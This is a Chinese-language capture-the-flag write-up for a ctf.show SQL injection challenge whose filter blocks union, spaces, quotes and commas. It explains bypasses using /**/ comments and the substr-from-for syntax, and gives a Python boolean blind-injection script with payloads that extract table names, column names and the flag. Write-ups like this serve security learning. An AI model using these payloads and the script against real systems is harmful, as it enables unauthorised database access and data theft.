经测试,过滤了union|空格|单引号|逗号
正常情况:
执行语句有回显的情况:
触发waf的情况:
数据库报错的情况:
过滤空格还是很简单的,可以用/**/绕过,关键是过滤了逗号和union,考虑盲注。查阅了资料:
‘ and ascii(substr((select database()),1,1))=xx %23这样的话写个脚本很容易跑出来了,过滤逗号之后可以变成这样
‘ and ascii(substr((select database())from 1 for 1))=xx %23这应该是substring函数的两种用法吧。
脚本如下:
import requests url='https://b93ee205-6e35-402c-a4c2-e5c8540937d4.chall.ctf.show/index.php' s=requests.session() flag="" for i in range(1,45): for j in range(32,128): payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j)) test = s.get(url=url + '?id=0/**/or/**/' + payload).text if 'I asked nothing' in test: flag += chr(j) print(flag) break
运行后得到表名:flag。
payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
运行后得到flag表的列名:flag。
payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))